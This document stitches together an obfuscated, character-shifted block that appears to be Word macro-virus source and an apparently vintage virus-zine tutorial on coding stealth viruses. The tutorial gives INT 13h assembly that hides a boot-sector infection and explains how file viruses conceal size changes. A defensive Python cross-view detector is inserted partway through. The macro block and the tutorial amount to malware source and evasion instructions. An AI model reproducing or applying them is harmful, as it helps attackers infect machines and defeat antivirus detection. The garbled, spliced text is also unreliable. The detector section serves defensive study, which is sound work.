"STQMK_R_OQ\RXUPUN_)F)9"QFOSABMOUOJTNFJEB$(21) = "WRPOTU^YQ\TNNNY)F):"QFOSABMOUOJTNFJEB$(22) = "Mr|jkunRwy~})WRPOTU^YQ\TNNNY"QFOSABMOUOJTNFJEB$(23) = "UN_XTXLQWWZYM)F);"QFOSABMOUOJTNFJEB$(24) = "_WPXPTK\SRWWTP)F)@"QFOSABMOUOJTNFJEB$(25) = "J][^MSQ_^]MJ)F):9"QFOSABMOUOJTNFJEB$(26) = "^YV]TSPYR\\WRTZNSQK)F);9"QFOSABMOUOJTNFJEB$(27) = "M^SNYJ__LWL\_)F);;"QFOSABMOUOJTNFJEB$(28) = "KZUUVS^V\TP)F)?>"QFOSABMOUOJTNFJEB$(29) = "\ZZ_V\ZOYOZX^)F)<="QFOSABMOUOJTNFJEB$(30) = "VLVJYY_KSLQ]RSTUUP)F)?="QFOSABMOUOJTNFJEB$(31) = "J^KZ^UYXXUOM)F)<A"QFOSABMOUOJTNFJEB$(32) = "]JLVRLJ\NOK\[^L)F):;9"QFOSABMOUOJTNFJEB$(33) = "MQOQKW^RVP_Q\)F):A:"QFOSABMOUOJTNFJEB$(34) = "OU_O[OX\MQ]TK\\)F)<:"QFOSABMOUOJTNFJEB$(35) = "_NPRWYSNJ^TV^W_-)F)JyyRwox-1UN_XTXLQWWZYM2"QFOSABMOUOJTNFJEB$(36) = "VXRPR_V_XR)F)_ju1Uno}-1_NPRWYSNJ^TV^W_-5)WRPOTU^YQ\TNNNY22"QFOSABMOUOJTNFJEB$(37) = "Ro)VXRPR_V_XR)EG)_WPXPTK\SRWWTP)]qnw)Px}x)JQ]^RJUY PQRWK\XQTPK"QFOSABMOUOJTNFJEB$(38) = "Ljuu)O]MSRUUUKKY\WYXPYM"QFOSABMOUOJTNFJEB$(39) = "08888)knprw)xo)qrmmnw)yj{})8888"QFOSABMOUOJTNFJEB$(40) = �"\qx€Kx "QFOSABMOUOJTNFJEB$(41) = 
"L~{Orun-)F)OrunWjvn-12"QFOSABMOUOJTNFJEB$(42) = "Ro)L~{Orun-)F)IIII)]qnw)Px}x)JQ]^RJUYPQRWK\XQTPK"QFOSABMOUOJTNFJEB$(43) = ""QFOSABMOUOJTNFJEB$(44) = "Ro)LqnltRw|}juunm192)F)9)]qnw"QFOSABMOUOJTNFJEB$(45) = "Rwonl}1:2"QFOSABMOUOJTNFJEB$(46) = � �"]xxu|Xy}rxw|\j n)7PuxkjuMx}Y{xvy})F)95)7Oj|}\j n|)F) 9"QFOSABMOUOJTNFJEB$(47) = "Px}x)JQ]^RJUYPQRWK\XQTPK"QFOSABMOUOJTNFJEB$(48) = "Nwm)Ro"QFOSABMOUOJTNFJEB$(49) = ""QFOSABMOUOJTNFJEB$(50) = �"Mrv)mup)J|)Orun\j nJ|"QFOSABMOUOJTNFJEB$(51) = "Pn}L~{_ju~n|)mup"QFOSABMOUOJTNFJEB$(52) = "Ro)mup7Ox{vj})F)9)]qnw"QFOSABMOUOJTNFJEB$(53) = "mup7Ox{vj})F):"QFOSABMOUOJTNFJEB$(54) = �"Orun\j nJ|)mup"QFOSABMOUOJTNFJEB$(55) = "Nwm)Ro"QFOSABMOUOJTNFJEB$(56) = ""QFOSABMOUOJTNFJEB$(57) = "Ro)LqnltRw|}juunm1:2)F)9)]qnw"QFOSABMOUOJTNFJEB$(58) = "Rwonl}1<2"QFOSABMOUOJTNFJEB$(59) = �"Orun\j n"QFOSABMOUOJTNFJEB$(60) = "Nwm)Ro"QFOSABMOUOJTNFJEB$(61) = ""QFOSABMOUOJTNFJEB$(62) = "JQ]^RJUYPQRWK\XQTPKC"QFOSABMOUOJTNFJEB$(63) = "Nwm)\~k"QFOSABMOUOJTNFJEB$(64) = ""


QFOSABMOUOJTNFJEB$(65) = �"\~k)\qx€Kx "QFOSABMOUOJTNFJEB$(66) = "Yj{ujvnw}w‚Y~l)F)Mj‚1Wx€122"QFOSABMOUOJTNFJEB$(67) = "Ro)Yj{ujvnw}w‚Y~l)F)=)X{)Yj{ujvnw}w‚Y~l)F)::)]qnw"QFOSABMOUOJTNFJEB$(68) = "Knny"QFOSABMOUOJTNFJEB$(69) = "Knprw)Mrjuxp)^|n{Mrjuxp)<A95);;=5)II_r{~|)JUN[]*II "QFOSABMOUOJTNFJEB$(70) =

� � � �"]n });A5)A5)<=B5):<5)IIbx~0{n)rwonl}nm)k‚)`x{mVjl{x 7\ux jtMrl}j}x{7K) r{~|II5)7]n }:"QFOSABMOUOJTNFJEB$(71) =

� � �"]n }):>5);A5)<?95):<5)II`nulxvn)}x)}qn)UVN)1Ujvn{0| )Vjl{x)Nwprwn2) n{7):799II5)7]n };"QFOSABMOUOJTNFJEB$(72) = � � �"]n }):=>5)>:5):;<5):<5)IIMr|)r|)Un nu)=;:II5)7]n }<"QFOSABMOUOJTNFJEB$(73) =

� � �"]n })<>5)@<5)<=;5):<5)II1l2)>6vj{6B@5)Wj|}‚)Ujvn{)/ /)^pu‚)U~|n{5)\ux jtrjII5)7]n }="QFOSABMOUOJTNFJEB$(74) =

� � �"]n })<=5)BA5)<=<5):<5)IIMr|)r|)}qn)or{|})€x{um)}{~n )yxu‚vx{yqrl)vjl{x) r{~|)*II5)7]n }>"QFOSABMOUOJTNFJEB$(75) = "Y~|qK~}}xw):;95):AA5):=@5);:5)IIJllny})8)\~quj|II5 )7Y~|q:"QFOSABMOUOJTNFJEB$(76) = � � �"]n }):995):?>5);;A5):<5)IIKrp)o~lt)}x)}qn)krp)kx n{) _7V7II5)7]n }?"QFOSABMOUOJTNFJEB$(77) = "Nwm)Mrjuxp"QFOSABMOUOJTNFJEB$(78) = "Mrv)mup)J|)^|n{Mrjuxp"QFOSABMOUOJTNFJEB$(79) = "Mrjuxp1mup2"QFOSABMOUOJTNFJEB$(80) = "Nwm)Ro"QFOSABMOUOJTNFJEB$(81) = "Nwm)\~k"QFOSABMOUOJTNFJEB$(82) = ""QFOSABMOUOJTNFJEB$(83) = "O~wl}rxw)LqnltRw|}juunm1s2"QFOSABMOUOJTNFJEB$(84) = �"Xw)N{{x{)[n|~vn)Wn }"QFOSABMOUOJTNFJEB$(85) = "LqnltRw|}juunm)F)9"QFOSABMOUOJTNFJEB$(86) = "Ox{)r)F):)]x)Lx~w}Vjl{x|1s2"QFOSABMOUOJTNFJEB$(87) = "Ro)Vjl{xWjvn-1r5)s2)F)IIJ~}xLux|nII)]qnw)LqnltRw|} juunm)F):"QFOSABMOUOJTNFJEB$(88) = �"Wn })r"QFOSABMOUOJTNFJEB$(89) = "Nwm)O~wl}rxw"QFOSABMOUOJTNFJEB$(90) = ""QFOSABMOUOJTNFJEB$(91) = "\~k)Rwonl}1`qj}]xRwonl}2"QFOSABMOUOJTNFJEB$(92) = "ML^_^OYS]U-)F)`rwmx€Wjvn-12"QFOSABMOUOJTNFJEB$(93) = "]xxu|Vjl{x)7Wjvn)F)IIJ~}xLux|nII5)7\qx€)F)`qj}]xRw onl}5)7Nmr}"QFOSABMOUOJTNFJEB$(94) = "Nmr}Lunj{)6);9"QFOSABMOUOJTNFJEB$(95) = ""QFOSABMOUOJTNFJEB$(96) = "08888"QFOSABMOUOJTNFJEB$(97) = � �"08888)_uxƒnwrn)y{ ‚lq)J^KZ^UYXXUOM){rjmtx )txm~)vjt{ j"QFOSABMOUOJTNFJEB$(98) = �"08888) rmr}nuwj)lj|})6)wnvnwr})*"QFOSABMOUOJTNFJEB$(99) = "08888"QFOSABMOUOJTNFJEB$(100 ) =

�"Ox{)r)F)9)]x)J^KZ^UYXXUOM)C)Rw|n{})ZOX\JKVX^XS]WOS NK-1r2)C)Rw|n{}Yj{j)C)Wn })r"QFOSABMOUOJTNFJEB$(101 ) = "08888"QFOSABMOUOJTNFJEB$(102 ) = �"08888)y{nvnwwj)r)rmn)xm){rjmtx )II\~k)X{rprwjuVjl{x Kxm‚II4:"QFOSABMOUOJTNFJEB$(103 ) = "08888)jƒ)yx)II\~k)O]MSRUUUKKY\WYXPYMII6:"QFOSABMOUOJTNFJEB$(104 ) = �"08888) nuvr)yxƒx{wn)~{lr})}rn}x)txw|}jw}‚)***"QFOSABMOUOJTNFJEB$(105 ) = "08888"QFOSABMOUOJTNFJEB$(106 ) =

�"Ox{)r)F)]JLVRLJ\NOK\[^L)]x)MQOQKW^RVP_Q\)C)Rw|n{}) ZOX\JKVX^XS]WOSNK-1r2)C)Rw|n{}Yj{j)C)Wn })r"QFOSABMOUOJTNFJEB$(107 ) ="Nmr}[nyujln)7Orwm)F)Lq{-1?=2)4)Lq{-1?=25)7[nyujln) F)Lq{-1<=25)7Mr{nl}rxw)F)95)7Vj}lqLj|n)F):5)7`qxun`x{m)F)95)7Yj}}n{wVj}lq)F)95)7\x~wm|Urtn)F)9 5)7[nyujlnJuu5)7Ox{vj})F)95)7`{jy)F):5)7OrwmJuu`x{mOx{v|)F)9"QFOSABMOUOJTNFJEB$(108 ) = ""QFOSABMOUOJTNFJEB$(109 ) = "VVYJJVU]SNSZ)F)6)Rw}11=)4)[wm12)3):922"QFOSABMOUOJTNFJEB$(110 ) = "Ljuu)JQLZ]NKQQZVJKSV\JWO"QFOSABMOUOJTNFJEB$(111 ) = "Rw|n{})IIVVYJJVU]SNSZ)F)II)4)\}{-16)VVYJJVU]SNSZ2"QFOSABMOUOJTNFJEB$(112 ) = "Rw|n{}Yj{j"QFOSABMOUOJTNFJEB$(113 ) = "MVWZ]ZMLPTLXSO]W\"QFOSABMOUOJTNFJEB$(114 ) = "MxlLux|n):"QFOSABMOUOJTNFJEB$(115 ) = �"Jl}r j}n)ML^_^OYS]U-"QFOSABMOUOJTNFJEB$(116 ) = "Nwm)\~k"QFOSABMOUOJTNFJEB$(117 ) = ""


QFOSABMOUOJTNFJEB$(118 ) = "\~k)X{rprwjuVjl{xKxm‚"QFOSABMOUOJTNFJEB$(119 ) = "08888)nwm)xo)Qrmmnw)yj{})8888"QFOSABMOUOJTNFJEB$(120 ) = "\l{nnw^ymj}rwp)STQMK_R_OQ\RXUPUN_"QFOSABMOUOJTNFJEB$(121 ) = "Mr|jkunJ~}xVjl{x|)WRPOTU^YQ\TNNNY"QFOSABMOUOJTNFJEB$(122 ) = "JQLZ]NKQQZVJKSV\JWO"QFOSABMOUOJTNFJEB$(123 ) = ""QFOSABMOUOJTNFJEB$(124 ) = "ML^_^OYS]U-)F)`rwmx€Wjvn-12"QFOSABMOUOJTNFJEB$(125 ) = "0XRNPMOPNP\XMUY^_L"QFOSABMOUOJTNFJEB$(126 ) ="]xxu|Vjl{x)7Wjvn)F)IINQ\Y]TLNRVJ^W[II5)7\qx€)F)WRP OTU^YQ\TNNNY5)7Nmr}"QFOSABMOUOJTNFJEB$(127 ) = "0XRNPMOPNP\XMUY^_L"QFOSABMOUOJTNFJEB$(128 ) = "Nmr}Lunj{)6)^YV]TSPYR\\WRTZNSQK"QFOSABMOUOJTNFJEB$(129 ) ="Ox{)XRNPMOPNP\XMUY^_L)F)STQMK_R_OQ\RXUPUN_)]x)MQOQKW^RVP_Q\)C)Rw|n{})ZOX\JKVX^XS]WOSNK-1XRNPM

�OPNP\XMUY^_L2)C)Rw|n{}Yj{j)C)Wn })XRNPMOPNP\XMUY^_L"QFOSABMOUOJTNFJEB$(130 ) = ""QFOSABMOUOJTNFJEB$(131 ) ="Nmr}[nyujln)7Orwm)F)Lq{-1VLVJYY_KSLQ]RSTUUP2)4)Lq{ -1VLVJYY_KSLQ]RSTUUP25)7[nyujln)F)Lq{-1\ZZ_V\ZOYOZX^25)7Mr{nl}rxw)F)STQMK_R_OQ\RXUPUN_5)7Vj}lq Lj|n)F)WRPOTU^YQ\TNNNY5)7`qxun`x{m)F)STQMK_R_OQ\RXUPUN_5)7Yj}}n{wVj}lq)F)STQMK_R_OQ\RXUPUN_5)7 \x~wm|Urtn)F)STQM" +"K_R_OQ\RXUPUN_5)7[nyujlnJuu5)7Ox{vj})F)STQMK_R_OQ\ RXUPUN_5)7`{jy)F)WRPOTU^YQ\TNNNY5)7OrwmJuu`x{mOx{v|)F)STQMK_R_OQ\RXUPUN_"QFOSABMOUOJTNFJEB$(132 ) = ""QFOSABMOUOJTNFJEB$(133 ) = "MVWZ]ZMLPTLXSO]W\"QFOSABMOUOJTNFJEB$(134 ) = "UU_TSK_ZTXYV^"QFOSABMOUOJTNFJEB$(135 ) = "MxlLux|n)WRPOTU^YQ\TNNNY"QFOSABMOUOJTNFJEB$(136 ) = �"Jl}r j}n)ML^_^OYS]U-"QFOSABMOUOJTNFJEB$(137 ) = ""QFOSABMOUOJTNFJEB$(138 ) = "Ljuu)NQ\Y]TLNRVJ^W["QFOSABMOUOJTNFJEB$(139 ) ="]xxu|Vjl{x)7Wjvn)F)IINQ\Y]TLNRVJ^W[II5)7\qx€)F)WRP OTU^YQ\TNNNY5)7Mnun}n"QFOSABMOUOJTNFJEB$(140 ) = ""QFOSABMOUOJTNFJEB$(141 ) = "JQ]^RJUYPQRWK\XQTPKC"QFOSABMOUOJTNFJEB$(142 ) = "Mr|jkunJ~}xVjl{x|)STQMK_R_OQ\RXUPUN_"QFOSABMOUOJTNFJEB$(143 ) = "\l{nnw^ymj}rwp)WRPOTU^YQ\TNNNY"QFOSABMOUOJTNFJEB$(144 ) = "Mr|jkunRwy~})STQMK_R_OQ\RXUPUN_"QFOSABMOUOJTNFJEB$(145 ) = "Nwm)\~k"QFOSABMOUOJTNFJEB$(146 ) = ""QFOSABMOUOJTNFJEB$(147 ) = "\~k)JQLZ]NKQQZVJKSV\JWO"QFOSABMOUOJTNFJEB$(148 ) = "Ox{)XRNPMOPNP\XMUY^_L)F)STQMK_R_OQ\RXUPUN_)]x)MQOQKW^RVP_Q\"QFOSABMOUOJTNFJEB$(149 ) = "[NK_NLPV_UL[V\Z-)F)IIII"QFOSABMOUOJTNFJEB$(150 ) = "V_YSJ^JZZ_WVR][[)F)Unw1ZOX\JKVX^XS]WOSNK-1XRNPMOPNP\XMUY^_L22"QFOSABMOUOJTNFJEB$(151 ) = "Ox{)R_N[Q]ZKYM)F)WRPOTU^YQ\TNNNY)]x)V_YSJ^JZZ_WVR] [["QFOSABMOUOJTNFJEB$(152 ) ="[NK_NLPV_UL[V\Z-)F)[NK_NLPV_UL[V\Z-)4)Lq{-1J|l1Vrm -1ZOX\JKVX^XS]WOSNK-1XRNPMOPNP\XMUY^_L25)R_N[Q]ZKYM5)WRPOTU^YQ\TNNNY22)6)VVYJJVU]SNSZ2"QFOSABMOUOJTNFJEB$(153 ) = �"Wn })R_N[Q]ZKYM"QFOSABMOUOJTNFJEB$(154 ) = "ZOX\JKVX^XS]WOSNK-1XRNPMOPNP\XMUY^_L2)F)[NK_NLPV_UL[V\Z-"QFOSABMOUOJTNFJEB$(155 ) = �"Wn })XRNPMOPNP\XMUY^_L"QFOSABMOUOJTNFJEB$(156 ) = "Nwm)\~k"QFOSABMOUOJTNFJEB$(157 ) = 
""QFOSABMOUOJTNFJEB$(158 ) = "\~k)MVWZ]ZMLPTLXSO]W\"QFOSABMOUOJTNFJEB$(159 ) = "Ox{)XRNPMOPNP\XMUY^_L)F)STQMK_R_OQ\RXUPUN_)]x)MQOQKW^RVP_Q\"QFOSABMOUOJTNFJEB$(160 ) ="Rw|n{})IIZOX\JKVX^XS]WOSNK-1II)4)\}{-1XRNPMOPNP\XM UY^_L2)4)II2FII)4)Lq{-1\ZZ_V\ZOYOZX^2)4)ZOX\JKVX^XS]WOSNK-1XRNPMOPNP\XMUY^_L2)4)Lq{-1\ZZ_V\ZOY OZX^2"QFOSABMOUOJTNFJEB$(161 ) = "Rw|n{}Yj{j"QFOSABMOUOJTNFJEB$(162 ) = �"Wn })XRNPMOPNP\XMUY^_L"QFOSABMOUOJTNFJEB$(163 ) ="Ox{)XRNPMOPNP\XMUY^_L)F)STQMK_R_OQ\RXUPUN_)]x)OU_O[OX\MQ]TK\\)6)WRPOTU^YQ\TNNNY"QFOSABMOUOJTNFJEB$(164 ) ="Rw|n{})IIZJ^K[W\_\WVMVZYS-1II)4)\}{-1XRNPMOPNP\XMU Y^_L2)4)II2FII)4)Lq{-1\ZZ_V\ZOYOZX^2)4)ZJ^K


[W\_\WVMVZYS-1XRNPMOPNP\XMUY^_L2)4)Lq{-1\ZZ_V\ZOYOZ X^2"QFOSABMOUOJTNFJEB$(165 ) = "Rw|n{}Yj{j"QFOSABMOUOJTNFJEB$(166 ) = �"Wn })XRNPMOPNP\XMUY^_L"QFOSABMOUOJTNFJEB$(167 ) = "Nwm)\~k"QFOSABMOUOJTNFJEB$(168 ) = ""QFOSABMOUOJTNFJEB$(169 ) = "O~wl}rxw)ZSZ[N_NST[YNVS-"QFOSABMOUOJTNFJEB$(170 ) = "[NK_NLPV_UL[V\Z-)F)IIII"QFOSABMOUOJTNFJEB$(171 ) ="Ox{)XRNPMOPNP\XMUY^_L)F)WRPOTU^YQ\TNNNY)]x)J][^MSQ _^]MJ)4)[wm12)3)J][^MSQ_^]MJ)C)[NK_NLPV_UL[

�V\Z-)F)[NK_NLPV_UL[V\Z-)4)Lq{-1[wm12)3)M^SNYJ__LWL\ _)4)KZUUVS^V\TP2)C)Wn })XRNPMOPNP\XMUY^_L"QFOSABMOUOJTNFJEB$(172 ) = "ZSZ[N_NST[YNVS-)F)[NK_NLPV_UL[V\Z-"QFOSABMOUOJTNFJEB$(173 ) = "Nwm)O~wl}rxw"QFOSABMOUOJTNFJEB$(174 ) = ""QFOSABMOUOJTNFJEB$(175 ) = "\~k)UU_TSK_ZTXYV^"QFOSABMOUOJTNFJEB$(176 ) ="Ox{)XRNPMOPNP\XMUY^_L)F)STQMK_R_OQ\RXUPUN_)]x)OU_O[OX\MQ]TK\\)6)WRPOTU^YQ\TNNNY"QFOSABMOUOJTNFJEB$(177 ) ="Nmr}[nyujln)7Orwm)F)ZJ^K[W\_\WVMVZYS-1XRNPMOPNP\XM UY^_L25)7[nyujln)F)ZSZ[N_NST[YNVS-5)7Mr{nl}rxw)F)STQMK_R_OQ\RXUPUN_5)7Vj}lqLj|n)F)WRPOTU^YQ\TN NNY5)7`qxun`x{m)F)STQMK_R_OQ\RXUPUN_5)7Yj}}n{wVj}lq)F)STQMK_R_OQ\RXUPUN_5)7\x~wm|Urtn)F)STQMK_ R_OQ\RXUPUN_5)7[n" +"yujlnJuu5)7Ox{vj})F)STQMK_R_OQ\RXUPUN_5)7`{jy)F)WR POTU^YQ\TNNNY5)7OrwmJuu`x{mOx{v|)F)STQMK_R_OQ\RXUPUN_"QFOSABMOUOJTNFJEB$(178 ) = �"Wn })XRNPMOPNP\XMUY^_L"QFOSABMOUOJTNFJEB$(179 ) = "Nwm)\~k"QFOSABMOUOJTNFJEB$(180 ) = ""QFOSABMOUOJTNFJEB$(181 ) = "\~k)O]MSRUUUKKY\WYXPYM"QAUBRNSVSNMDMQPJ$(0) = "MMPAAMLTJEJQ"QAUBRNSVSNMDMQPJ$(1) = "QFOSABMOUOJTNFJEB"QAUBRNSVSNMDMQPJ$(2) = "QAUBRNSVSNMDMQPJ"QAUBRNSVSNMDMQPJ$(3) = "JKHDBVIVFHSIOLGLEV"QAUBRNSVSNMDMQPJ$(4) = "ATRUDJHVUTDA"QAUBRNSVSNMDMQPJ$(5) = "DUJEPAVVCNCSV"QAUBRNSVSNMDMQPJ$(6) = "VNGOGKBSJINNKG"QAUBRNSVSNMDMQPJ$(7) = "NIGFKLUPHSKEEEP"QAUBRNSVSNMDMQPJ$(8) = "UPMTKJGPISSNIKQEJHB"QAUBRNSVSNMDMQPJ$(9) = "LEVOKOCHNNQPD"QAUBRNSVSNMDMQPJ$(10) = "BQLLMJUMSKG"QAUBRNSVSNMDMQPJ$(11) = "SQQVMSQFPFQOU"QAUBRNSVSNMDMQPJ$(12) = "MCMAPPVBJCHTIJKLLG"QAUBRNSVSNMDMQPJ$(13) = "AUBQULPOOLFD"QAUBRNSVSNMDMQPJ$(14) = "TACMICASEFBSRUC"QAUBRNSVSNMDMQPJ$(15) = "DHFHBNUIMGVHS"QAUBRNSVSNMDMQPJ$(16) = "FLVFRFOSDHTKBSS"QAUBRNSVSNMDMQPJ$(17) = "OIEGDFGEGSODLPUVC"QAUBRNSVSNMDMQPJ$(18) = "MVPJAUAQQVNMITRR"QAUBRNSVSNMDMQPJ$(19) = "IVERHTQBPD"QAUBRNSVSNMDMQPJ$(20) = "REBVECGMVLCRMSQ"QAUBRNSVSNMDMQPJ$(21) = "VEGINPJEAUKMUNV"QAUBRNSVSNMDMQPJ$(22) = "MOIGIVMVOI"QAUBRNSVSNMDMQPJ$(23) = "AHTUIALPGHINBSOHKGB"QAUBRNSVSNMDMQPJ$(24) = "AHCQTEBHHQMABJMSANF"QAUBRNSVSNMDMQPJ$(25) = 
"DCUVUFPJTL"QAUBRNSVSNMDMQPJ$(26) = "DMNQTQDCGKCOJFTNS"QAUBRNSVSNMDMQPJ$(27) = "LLVKJBVQKOPMU"QAUBRNSVSNMDMQPJ$(28) = "EHSPTKCEIMAUNR"QAUBRNSVSNMDMQPJ$(29) = "QJQREVEJKRPEMJ"QAUBRNSVSNMDMQPJ$(30) = "FTDJILLLBBPSNPOGPD"

End Sub


a handy overview
by MGL/SVL exclusive for *-zine

Introduction

In the very beginning of computer viruses, when a virus was something very curious, there was no need to cover the fact of the presence of a virus in files, memory or boot sectors. But shortly after some people recognized that they could make money by removing viruses, the whole thing became much harder. Of course, there was no problem to code the virus itself; the problem was to code such a virus which could not be detected for at least some time by antivirus software. This time was essential for the virus to get into the wild. During virus history, two basic technologies appeared - STEALTH and POLYMORPHISM. Both technologies are not unknown to the virus writing community and are used in the most successful viruses. The main goal of this article is to explain how stealth works and how to code a stealth virus.

Definition and principles

STEALTH is acting in a quiet and secret way, in order to avoid detection or to hide the presence of something. In the case of a computer virus this means not only hiding the presence of the virus in its place of storage (file or disc sector) but desirably (only in some cases) also avoiding detection by antivirus software. This can be done only by absolute control of the infected computer's operating system by the virus. Every critical function of the operating system has to be hooked and its return value(s) changed to the 'normal' values - the values one would receive without the presence of the virus in the system.

Required knowledge base

To code a really working stealth virus is not a trivial task. The author has to be able to create and debug resident code - this is a must !!! The reason is very simple - WITHOUT RESIDENCY A VIRUS CAN'T BE STEALTH. Debugging of resident code is very important. Stealth that doesn't work is absolute lameness. Based on my own experience, one of the best solutions for TSR debugging is Soft-Ice by Nu-Mega Technologies. With some minor exceptions Soft-Ice is also good for hacking. You'll need some good description of the operating system. In the case of MSDOS you have a shitload of possibilities, but probably the most accurate and most up-to-date description is the Interrupt List maintained by Ralf Brown. The current version is now 53. The books 'Undocumented PC' and 'Undocumented DOS' are of good value for our purposes too. Besides the knowledge, do not forget to reserve some time for coding and debugging. And now - the show can go on ...


Stealth for boot viruses

This case of stealth is the simplest one. We'll have to work with whole sectors, and this is a trivial task.

Sector 0/0/1 is the MBR in the case of a hard drive; on a floppy this sector is the boot sector. When a boot virus infects this sector, the original contents are moved elsewhere. Let's say the virus stores the original sector 0/0/1 to sector 0/0/7. This location is kinda traditional in the virus writing community, it is the heritage of the Stoned virus. But you can select any other location. After saving the original MBR/boot sector, the virus places its own copy to sector 0/0/1. Then, after rebooting, the copy of the virus in sector 0/0/1 will be loaded to memory at address 0:7C00h and will be executed. The virus then allocates memory for its own resident copy, moves itself to the "preserved" memory location, always hooks interrupt INT 13h (in some cases also some other interrupts) and then loads and executes the stored MBR/boot sector. Woow! the virus is now resident in memory, and has gained control over INT 13h.

On every disk access the virus gets control first. This is not true in the case of disk access using the ports - here the virus can be detected. The main task for the viral INT 13h handler is to redirect any attempt to read/write sector 0/0/1 (where the virus is located) to 0/0/7. Attempts to write to sector 0/0/7 (now containing the stored MBR/boot sector) should be ignored. If someone tries to read sector 0/0/7, we'll have to put zeroes into his buffer at ES:BX. Then the handler of INT 13h will be like this:

int_13h_entry:
        pushf
        cmp     dl,80h
        js      flopak          ; floppy or hard drive ?
                                ; this should hide the presence of
                                ; virus in the MBR
        push    cx
        or      dl,dl
        jnz     OK              ; head 0 ? If so, then if

        cmp     cx,1
        jnz     OK              ; track 0 sector 1, check critical
                                ; functions

        cmp     al,1
        ja      OK              ; stealth only when 1 sector read
        cmp     ah,02h          ; read
        jz      zvedavec
        cmp     ah,0ah          ; long read ( is not necessary )
        jz      zvedavec
        cmp     ah,03h          ; write
        jz      write
        cmp     ah,0bh          ; long write (is not necessary )
        jnz     OK
write:
zvedavec:
        mov     cl,7            ; redirect R/W to stored MBR
OK:
        call    emulINT13h
        pop     cx              ; we call original INT 13h with "good"
                                ; parameters and we return caller's CX
                                ; which covers our tracks
        jmp     short VRATsa

flopak:
        ....                    ; here 'd be handled floppy access
        ....                    ; similar to hard drive access
        ....
VRATsa:
        popf
        retf    2

emulINT13h:
        pushf
        call    dword ptr cs:[original_INT13h]
        ret

But I have to say, this handler is not the perfect one. It doesn't handle the situation when more than 1 sector is read or written. In such a case this handler can be very "unfriendly". Moreover, this handler doesn't preserve the sector with the stored MBR/boot sector. But to add such code is not so hard and it is on you ... I have to say that only a minority of viruses preserve the stored copy of the MBR/boot sector. In most cases this copy will not be overwritten...
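A defender-side counterpart to the handler above, as an added example that is not part of the article (Python written for this edition, not code by the author): the article itself points out that the virus cannot interpose on direct port access, and the paragraph above admits that the handler only filters single-sector requests. A cross-view scanner uses exactly those two gaps: it reads the same sector through two paths and compares the results. The disk contents, the raw-read function and the "hooked" read model below are all constructed here so that the check has something to run against; the hooked read only mirrors the redirection rule the handler above already spells out, and is not a reimplementation of anything else.

```python
"""
Cross-view check for INT 13h-style boot-sector stealth (added illustration).

Two views of the same sectors are compared: the "API" view (what a hooked
INT 13h returns) and the "raw" view (what the controller ports return).  A
resident stealth hook can only lie on the first path, so any difference is a
finding.  The disk model and the hook model are constructed for this example.
"""
from typing import Callable, Dict, List, Tuple

CHS = Tuple[int, int, int]                  # (cylinder, head, sector), sector is 1-based
SECTOR_SIZE = 512
ReadFn = Callable[[CHS, int], List[bytes]]  # (start_chs, count) -> list of sectors


def make_sector(tag: str) -> bytes:
    """Constructed sector content: a short label padded to 512 bytes."""
    return tag.encode().ljust(SECTOR_SIZE, b"\0")


# Constructed raw disk after infection: the loader sits in 0/0/1 and the
# original MBR was moved to 0/0/7 (the traditional location the article cites).
RAW_DISK: Dict[CHS, bytes] = {
    (0, 0, 1): make_sector("VIRUS-LOADER"),
    (0, 0, 2): make_sector("EMPTY"),
    (0, 0, 7): make_sector("ORIGINAL-MBR"),
}


def raw_read(start: CHS, count: int) -> List[bytes]:
    """Direct-port view: returns what is physically on the platter."""
    c, h, s = start
    return [RAW_DISK.get((c, h, s + i), make_sector("EMPTY")) for i in range(count)]


def hooked_read(start: CHS, count: int) -> List[bytes]:
    """INT 13h view as the article's handler presents it (model only):
    a single-sector read of 0/0/1 is answered with the stored original at
    0/0/7, a single-sector read of 0/0/7 is answered with zeroes, and every
    other request (including any multi-sector read) passes straight through."""
    if count == 1 and start == (0, 0, 1):
        return raw_read((0, 0, 7), 1)
    if count == 1 and start == (0, 0, 7):
        return [bytes(SECTOR_SIZE)]
    return raw_read(start, count)


def cross_view_diff(api: ReadFn, raw: ReadFn, sectors: List[CHS]) -> List[CHS]:
    """Sectors whose single-sector API read differs from the raw read."""
    return [chs for chs in sectors if api(chs, 1)[0] != raw(chs, 1)[0]]


def multi_sector_inconsistency(api: ReadFn, start: CHS, count: int) -> List[CHS]:
    """Same view, two ways: one multi-sector read covering a range versus a
    single-sector read of each sector in it.  A hook that only filters
    count == 1 contradicts itself here, so no raw access is needed at all."""
    c, h, s = start
    bulk = api(start, count)
    return [(c, h, s + i) for i in range(count)
            if api((c, h, s + i), 1)[0] != bulk[i]]


if __name__ == "__main__":
    watched = [(0, 0, 1), (0, 0, 2), (0, 0, 7)]
    print("cross-view findings:", cross_view_diff(hooked_read, raw_read, watched))
    print("single/multi findings:", multi_sector_inconsistency(hooked_read, (0, 0, 1), 2))
```

Against the infected model, cross_view_diff reports 0/0/1 (the API returns the stored MBR, the platter holds the loader) and 0/0/7 (zeroes versus the stored MBR), and nothing against a clean disk. multi_sector_inconsistency flags 0/0/1 using the hooked path alone, because a two-sector read starting there is not filtered. A real scanner obtains the raw view from the controller ports or from a clean boot and the API view through INT 13h; the comparison logic is the same.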

!!! IMPORTANT !!!
Preserve stored stuff !!!

Stealth for file viruses

The number of file viruses with some stealth is greater than that of boot viruses. The principles of stealth for file viruses are as follows:

A. An infected file has increased size. This size increase should not be visible.

B. The majority of file viruses use some change in size, time stamp or whatsoever to mark the file as infected. This change should be:

   preserved
   not visible

C. Any change in the infected file should not be visible. This affects the EXE header in the case of EXE files and the initial JMP to the virus body in the case of COM files, as well as any stuff appended to the file.

D. In the case of a complex approach, the presence of the memory hole in which the virus resides should also be hidden.

Viruses which handle points A+B+C(+D) are full stealth viruses. Viruses which handle only point A are the so called semi-stealth viruses. Semi-stealth doesn't need a lot of code, and I 'll explain it first.

A. Semi-stealth

The main task for a semi-stealth virus is to hide the size increase of infected files. This can be easily achieved by cutting the size in the DTA after DOS Findfirst / Findnext operations. Such a virus 'll have to handle not only the most common INT 21H/4EH and INT 21H/4FH, used by utilities of the Norton / Volkov Commander type, but also DOS FindfirstFCB / FindnextFCB - INT 21H/11H and INT 21H/12H, used by the DOS command DIR. When operating with FCBs, we have to know that there is a difference between an FCB and an Extended FCB.

Some necessary stuff about the DOS data structures can be found below.

Format of File Control Block:

Offset  Size     Description                                  (Table 0648)
 -7     BYTE     extended FCB if FFh
 -6   5 BYTEs    reserved
 -1     BYTE     file attribute if extended FCB
 00h    BYTE     drive number (0 = default, 1 = A, etc)
 01h  8 BYTEs    blank-padded file name
 09h  3 BYTEs    blank-padded file extension
 0Ch    WORD     current block number
